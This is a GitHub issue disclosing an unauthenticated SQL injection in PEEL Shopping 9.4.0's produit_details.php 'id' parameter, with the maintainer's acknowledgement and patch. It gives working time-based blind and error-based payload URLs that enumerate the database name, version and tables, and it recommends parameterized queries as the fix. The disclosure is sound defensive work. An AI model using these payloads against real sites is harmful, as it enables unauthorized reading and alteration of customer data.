Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection in "produit_details.php?id" parameter (Unauthenticated) #3

Closed
faisalfs10x opened this issue Jul 11, 2021 · 5 comments
Closed
Assignees

Comments

@faisalfs10x
Copy link

faisalfs10x commented Jul 11, 2021

Vulnerability Name: SQL Injection in "produit_details.php?id" parameter

Date of Discovery: 10 July 2021

Product version: 9.4.0 . Download link

Author: faisalfs10x

Vulnerability Description: Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data.

Vulnerable URL: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]

Proof of Concept:

1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel".

url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)

[PoC enum db name]
enum_dbname

2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE.

url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)

[Poc enum MariaDB]
enum_dbversion(MariaDB)

3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly.

url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)

[PoC enum table peel_produits]
enum_tablename

To produce SQL syntax error, it is possible to intercept the request before it is redirect to homepage using a tool like BurpSuite (repeater).

Error syntax: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELdECT(SLEEP(3-(IF(USER()+LIKE+0xGEN_ERROR,0,5)))))ERR)

  1. [MariaDB disclosed image]
    sql_error_mariadb

  2. [peel_produits table_name disclosed]
    sql_errorbased2

Dump table name = peel_profil

dump_table_peel_profil

Consequences:

  • Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL Injection vulnerabilities.
  • Integrity: Just as it may be possible to read sensitive information eg client/customer sensitive data, it is also possible to make changes or even delete this information with a SQL Injection attack.

Mitigation: Use of Prepared Statements (with Parameterized Queries). It would be good also to casting integer to ensure only numerical data is inserted in 'id' parameter eg - intval($_GET['id'])
cc @advisto

References for Mitigation Vulnerability: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

@advisto advisto self-assigned this Jul 13, 2021
@advisto
Copy link
Owner

advisto commented Jul 13, 2021

Thanks.

This was due to a change of structure to get product details, in order to potentially link it to a product API instead of reading data from MySQL.
The previously done protection was no more active, thus it was necessary to add an intval on the GET parameter.

=> Subject closed

@advisto advisto closed this as completed Jul 13, 2021
@faisalfs10x
Copy link
Author

So, i noticed you made code changes on this line right. file produit_details.php . But, the bug is still affected on version 9.3.0 anyway.

code_changes

@advisto
Copy link
Owner

advisto commented Jul 13, 2021

The version which can be downloaded on our website is now patched

@faisalfs10x
Copy link
Author

That's great. Thanks for acknowledge the vulnerability.

@advisto
Copy link
Owner

advisto commented Jul 13, 2021

Thanks for your remarks.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants